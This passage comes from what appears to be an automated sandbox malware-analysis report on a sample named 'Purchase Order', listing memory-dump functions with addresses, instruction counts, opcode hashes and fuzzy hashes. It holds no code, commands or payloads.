                                                                                                            • Instruction Fuzzy Hash: 6EE0BD7464020ACFD708DFA0C594AAABBF2AF48708F214499D902EB365CB369D81CE50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586BCC9 Relevance: .0, Instructions: 15COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6997e53848d54c245aa8b2a4306fc3886aa2c31a02a3863e5d54e06b53163dc
                                                                                                            • Instruction ID: d8cc1846b42a3e5aa8c08367cb4173d82cf1fef8d8ccd1a0ba0fb785293d1049
                                                                                                            • Opcode Fuzzy Hash: c6997e53848d54c245aa8b2a4306fc3886aa2c31a02a3863e5d54e06b53163dc
                                                                                                            • Instruction Fuzzy Hash: 5DD05E3700410CAFCB016FC4EC04F517FA99B48301F098095FA098B273D2229520FF12
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B0468 Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e20029484efca2db33b9121e8d13b3ac52b8828335b47197b6bf7e42f6e783f
                                                                                                            • Instruction ID: 37267a624e612748c9aae68b339fd08f10958d9a7100cb78cac920b94f7405ae
                                                                                                            • Opcode Fuzzy Hash: 5e20029484efca2db33b9121e8d13b3ac52b8828335b47197b6bf7e42f6e783f
                                                                                                            • Instruction Fuzzy Hash: E8D0A752A4A58413DB14D6289D8E38A7BE66BA920DF4CC0B9C5054A142E578815B8282
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B272F Relevance: .0, Instructions: 14COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8fa54e899ee3682f58efd36757a0a6b191379010ca93caf626380decec1816ea
                                                                                                            • Instruction ID: eba459aafc26383631019d4ca12dabd6ff018805845e7719d2cf94fe88abedda
                                                                                                            • Opcode Fuzzy Hash: 8fa54e899ee3682f58efd36757a0a6b191379010ca93caf626380decec1816ea
                                                                                                            • Instruction Fuzzy Hash: 49E09278D01218EFEB14CFA4EC84B8DBBB0BB08300F008196E81DB7350D7711A858F20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B39C2 Relevance: .0, Instructions: 13COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc5eef05a4143f0c5583369ce885365b4aeabfbfc7459d63226555b1a229cf71
                                                                                                            • Instruction ID: d66aa69c50ebcfa10317cfc5b521ddd4aaf44b9017af691b44aefdc6b9430f27
                                                                                                            • Opcode Fuzzy Hash: fc5eef05a4143f0c5583369ce885365b4aeabfbfc7459d63226555b1a229cf71
                                                                                                            • Instruction Fuzzy Hash: BBD022B140AB0C0BC7201694ED0A7BA3AA89340302F810038720D001D2FE659814C6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BB4AA Relevance: .0, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 12488f0a1d0d2256f8b3e1a16a4f434cac23b66c0cf23a60ff8f3deb6d6f0b49
                                                                                                            • Instruction ID: a38f4e7e32232820f8d8e78c4868d2f0e71090845e2bd96caa2338be74f86781
                                                                                                            • Opcode Fuzzy Hash: 12488f0a1d0d2256f8b3e1a16a4f434cac23b66c0cf23a60ff8f3deb6d6f0b49
                                                                                                            • Instruction Fuzzy Hash: 07D06C30118254CFC3249B28C458AA87B7AFB4A346F9054EAE00E9A252CB329982CE10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B2B63 Relevance: .0, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e37f45c25fbceba0b7709d8363d98b371689bac257207ef92f34de12c8516850
                                                                                                            • Instruction ID: e8d13d5ad3e837248ac1087ddfa4e52e5e6e9eb80ab5a5fa5d3e1635edcf3160
                                                                                                            • Opcode Fuzzy Hash: e37f45c25fbceba0b7709d8363d98b371689bac257207ef92f34de12c8516850
                                                                                                            • Instruction Fuzzy Hash: 9BD0C935E4010EDBDB31CE258901AEE77F4AB0A245F0084A2A829DA700F270D5028F20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B39D0 Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5762912c89b1052399ce181af6df7dffb73ec618c967ea1c9f7e9b1e295ff2d8
                                                                                                            • Instruction ID: 29ebccaa3780fce5d653b0902780ef47ba5c123853fd3c8c9267aa92f2ce4a8a
                                                                                                            • Opcode Fuzzy Hash: 5762912c89b1052399ce181af6df7dffb73ec618c967ea1c9f7e9b1e295ff2d8
                                                                                                            • Instruction Fuzzy Hash: 10C09B7001660C47D7141AD5E91B7FA7BDC5741315F400035770D055A16E765C55D6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B9880 Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02a82d2e7ec7eec1d7bb85a22b403cb7513d239c4d9339bbd19b13325c5d04af
                                                                                                            • Instruction ID: 680a2ef44f3b37c9e1cf2651d7d102085eb26bacfaf0c5627b683235300c6776
                                                                                                            • Opcode Fuzzy Hash: 02a82d2e7ec7eec1d7bb85a22b403cb7513d239c4d9339bbd19b13325c5d04af
                                                                                                            • Instruction Fuzzy Hash: BDC08C390162088BC320ABA4EE0D76E3EA8670130AF004020B208012114EB04096C6B7
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B274E Relevance: .0, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 543088cb2fd993b2514b15c7c3d7ac7e80cb304a9b4844bd98c4bda88566ace4
                                                                                                            • Instruction ID: 2483d730d257db1a4aa17a1400afc1f6d5e9e3c61419268f7c7ed960bf6777a0
                                                                                                            • Opcode Fuzzy Hash: 543088cb2fd993b2514b15c7c3d7ac7e80cb304a9b4844bd98c4bda88566ace4
                                                                                                            • Instruction Fuzzy Hash: E4D06C7890416ADFDB20CFA4D844B9CBBB0AB18380F0084EB980AB6200DA711E86CF30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5198 Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 991c4b25e417facda9abe56bb0dbb0f1b214d49ee73afe66eed6fc34e3f09d3a
                                                                                                            • Instruction ID: b9816d781f5e64fecb44b488f2fb4348679626928120072c70dabfe1db9eea9c
                                                                                                            • Opcode Fuzzy Hash: 991c4b25e417facda9abe56bb0dbb0f1b214d49ee73afe66eed6fc34e3f09d3a
                                                                                                            • Instruction Fuzzy Hash: 8EC08CBA2100502FE3016A80EC04B417AC0BF20308F09E09A84404F272D0018526EB22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B43CC Relevance: .0, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7ffbdf1886a6fb670daa42f57b2e01fee2f5472bd2141d92e31b9496f25a275b
                                                                                                            • Instruction ID: 4817f46d14f0401c66052a3837956eeb7ca44778e06755ff59f7cdb671b01e0e
                                                                                                            • Opcode Fuzzy Hash: 7ffbdf1886a6fb670daa42f57b2e01fee2f5472bd2141d92e31b9496f25a275b
                                                                                                            • Instruction Fuzzy Hash: 92C09B75114004AEC641EB94CDC4D65BAE1FF55300B44EC57754489031DA21D53AF722
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B5B0C Relevance: .0, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 26d51d327a344547190ad97b9c922023c1ca52b6a452548c838ddab39096d8cc
                                                                                                            • Instruction ID: f335a159b88ff24dc0cc7a4bc97028027f4e6a544206753d018ea8d00b75c05d
                                                                                                            • Opcode Fuzzy Hash: 26d51d327a344547190ad97b9c922023c1ca52b6a452548c838ddab39096d8cc
                                                                                                            • Instruction Fuzzy Hash: F7B012A519CE05A1D4083A644CE0E6BE470EBF2700F40EC2B324408050CC218425E23F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B6BE8 Relevance: .0, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4a885137b888689c0a8b14b4625c2e332491bcd094b900c5a9de1b8a6f561838
                                                                                                            • Instruction ID: 29b1bf12b0a4772af1b42595e471ff5b5715cafdaae894aebded49c42de2b0af
                                                                                                            • Opcode Fuzzy Hash: 4a885137b888689c0a8b14b4625c2e332491bcd094b900c5a9de1b8a6f561838
                                                                                                            • Instruction Fuzzy Hash: 38B092E6968B881FF30935B18C55756AA004BB6345F0BA0671B616F2C2E9005818823A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BA050 Relevance: .0, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 06a7ae61106e8da2d64c17fb23f4dc0df85428db4e5c3220740e12069e2eeca8
                                                                                                            • Instruction ID: 4713d12b5d0855b47829b85e69df9ec4064a02103b6db9b3448307dc4d8d7b77
                                                                                                            • Opcode Fuzzy Hash: 06a7ae61106e8da2d64c17fb23f4dc0df85428db4e5c3220740e12069e2eeca8
                                                                                                            • Instruction Fuzzy Hash: C0C01230A06218CFDB90CB18EC84F98BBB4FB48310F009695E00DA3210DE301ECACF45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0586F2C6 Relevance: .0, Instructions: 8COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62f3cb501fe97e2a93d91062d7afa2e29cc026b3ea749e8d4e08bc09a09241ce
                                                                                                            • Instruction ID: d57209f9019f233c90c1bf5ea1c37dd67ad5e03e51b182ce72f208b7e94eff4a
                                                                                                            • Opcode Fuzzy Hash: 62f3cb501fe97e2a93d91062d7afa2e29cc026b3ea749e8d4e08bc09a09241ce
                                                                                                            • Instruction Fuzzy Hash: 54B09234A00215CFC709DBB0C86086973E2BF8C6953658868C406DB268CA369881CE10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B277E Relevance: .0, Instructions: 7COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 043a2ed0d81e1a2e8cd5d14a699bb3799a1a6878af8dda73555fd11ddd5387c6
                                                                                                            • Instruction ID: 6b642f4d42f87127880bfda87df5bcd12ecb154a2b6e3c7b5e5014356a9963fa
                                                                                                            • Opcode Fuzzy Hash: 043a2ed0d81e1a2e8cd5d14a699bb3799a1a6878af8dda73555fd11ddd5387c6
                                                                                                            • Instruction Fuzzy Hash: E2B0923095801ACBCB08CA46CC200FCBAB6BBA4340700A92680161B211DB6109038624
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 058695A8 Relevance: .0, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 411f54346c77bad16428224f73e6fba877a64db7049252209ebf8e9f6f0481f3
                                                                                                            • Instruction ID: 0e6a9443f1aafe7ce8a88157d4859d0ac9b2370ec52ae91984c8270b5d1e77e8
                                                                                                            • Opcode Fuzzy Hash: 411f54346c77bad16428224f73e6fba877a64db7049252209ebf8e9f6f0481f3
                                                                                                            • Instruction Fuzzy Hash: 25A0025465551D42DF097F6C08DCBB94551EB85309FD06C619C55D3192AC344C0D601B
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 094B3AD8 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'fq$:$pjq$~
                                                                                                            • API String ID: 0-2740937384
                                                                                                            • Opcode ID: c43487908b4f9db21be661141e60a6ee0714b8b3b26a08ab77db6f8631502865
                                                                                                            • Instruction ID: e06254ca67092c97f743bec4d3668d21b28c3aceef7f8eca03e270284888d8fc
                                                                                                            • Opcode Fuzzy Hash: c43487908b4f9db21be661141e60a6ee0714b8b3b26a08ab77db6f8631502865
                                                                                                            • Instruction Fuzzy Hash: F632D275A01218DFDB15CFA9C984F99BBB2FF48304F1580E9E509AB262DB329D91DF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05304A30 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PHfq$PHfq
                                                                                                            • API String ID: 0-3546021038
                                                                                                            • Opcode ID: 8d90bdbd6cecdb6007dfef4df19cf73b88c6077ba37a71f17aa80768b9e42d9e
                                                                                                            • Instruction ID: 865cd44f34bcd7412a7922e89df2e5823fdbbb29c79c711cef69a5ef3e984af4
                                                                                                            • Opcode Fuzzy Hash: 8d90bdbd6cecdb6007dfef4df19cf73b88c6077ba37a71f17aa80768b9e42d9e
                                                                                                            • Instruction Fuzzy Hash: 6DD1D774A00604CFDB18DF69C598EA9B7F1BF8D311F1590A9E506AB3A1DB31AD41CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05869768 Relevance: .6, Instructions: 618COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 42fafda0d48d4803477b7fa40f36ac96833ea1d9dfc742853fdc8546d13aca72
                                                                                                            • Instruction ID: fbb9193d4c9304510ed9784d1e79faf4e758cc000054dc6eca65e2e22e5e26f3
                                                                                                            • Opcode Fuzzy Hash: 42fafda0d48d4803477b7fa40f36ac96833ea1d9dfc742853fdc8546d13aca72
                                                                                                            • Instruction Fuzzy Hash: 87525D70A003458FCB15DF28C844B99B7B2EF86314F2586E9D5586F3A2DB71AD86CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 058697D8 Relevance: .6, Instructions: 588COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1735921052.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5860000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0cac75485eb4840340ff17cfc7bad9500ee8dcd7e3c13be405b6e790dd30e6cd
                                                                                                            • Instruction ID: 82c92a11955aaa221f66904bdb329f645373c599b2f4fbfefa5e9d1d9c49cb02
                                                                                                            • Opcode Fuzzy Hash: 0cac75485eb4840340ff17cfc7bad9500ee8dcd7e3c13be405b6e790dd30e6cd
                                                                                                            • Instruction Fuzzy Hash: DD525E34A007098FCB14DF28C844B99B7B2FF85314F2586A9D5586F3A1DB71AD86CF81
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05305BE8 Relevance: .4, Instructions: 396COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d60ff55fd8035f3f49eced7bc8df90440226df1c58f85599c4fd858c7e57ca04
                                                                                                            • Instruction ID: 43837d6a2e9f9b36c38561d31a9782ab252e56ed0ab360c86e3a0610f7e93a3d
                                                                                                            • Opcode Fuzzy Hash: d60ff55fd8035f3f49eced7bc8df90440226df1c58f85599c4fd858c7e57ca04
                                                                                                            • Instruction Fuzzy Hash: 71E198317057058FDB29DB79C464BAAB7FAAFC8600F548469D14ACB2D4DF34E842CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BEA50 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c66a05d5d1e30365a38d2c96ad00a596228726528ff2114227e1af99ce0f7e05
                                                                                                            • Instruction ID: f4802488bb351a24dd17f16e21a54bd6994364ee592d122eca11994503f998c8
                                                                                                            • Opcode Fuzzy Hash: c66a05d5d1e30365a38d2c96ad00a596228726528ff2114227e1af99ce0f7e05
                                                                                                            • Instruction Fuzzy Hash: 35E1D674E041198FCB14CFA9C5909AEFBF2FB89305F24816AD815AB355D731AD82CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BDDA8 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 71bba94bf8114a4e2a40c60039430b93e645e29b22f140c883edd736ca039e2c
                                                                                                            • Instruction ID: 72c7862c624d38ad66199637d47abbedc8b4b67a210dbc0d32853d9ffea5e261
                                                                                                            • Opcode Fuzzy Hash: 71bba94bf8114a4e2a40c60039430b93e645e29b22f140c883edd736ca039e2c
                                                                                                            • Instruction Fuzzy Hash: 93E1C974E041198FCB14CFA9C5809AEFBB2FF89315F248159D815AB355D731AD82CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BE1E0 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 19e70eb37820d5b1f6f47e246515ee7c89b8a73f52eac67586a3dc7c3e97d250
                                                                                                            • Instruction ID: cdb90e4f0c152ff538dd2a9f5f243a8576813423f2dd5057723b99222d3fe76a
                                                                                                            • Opcode Fuzzy Hash: 19e70eb37820d5b1f6f47e246515ee7c89b8a73f52eac67586a3dc7c3e97d250
                                                                                                            • Instruction Fuzzy Hash: DCE1C674E041198FDB14CFA9C5849AEFBB2FB89305F24816AD814AB355D731AD82CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094BE618 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1737500638.00000000094B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 094B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_94b0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c07a2c9bbb09e9419b864bc036293ec92e7cdde3dfd90ad08b13ec127affb576
                                                                                                            • Instruction ID: ba1f116488992137b5e753c482e1c0ce21000e795d20cb2fb2317774c449a10d
                                                                                                            • Opcode Fuzzy Hash: c07a2c9bbb09e9419b864bc036293ec92e7cdde3dfd90ad08b13ec127affb576
                                                                                                            • Instruction Fuzzy Hash: 94E1E875E001198FCB14CFA9C5849AEFBB2FF89305F24815AD815AB355D731AD82CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05300740 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734783590.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_5300000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a546f7272bf1f9980be5af7df2a6aba2f4277dd76b463200fc493bb4fe5047fd
                                                                                                            • Instruction ID: ced57a2410ba024b3a0c3a96c195c7a0ddc8a78addc1a60230754b868ff8a9ef
                                                                                                            • Opcode Fuzzy Hash: a546f7272bf1f9980be5af7df2a6aba2f4277dd76b463200fc493bb4fe5047fd
                                                                                                            • Instruction Fuzzy Hash: 67E10774E042198FCB14CF99C594AAEFBB2FF88305F249169D814AB355D731AD82CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 094B622F Relevance: .3, Instructions: 267COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
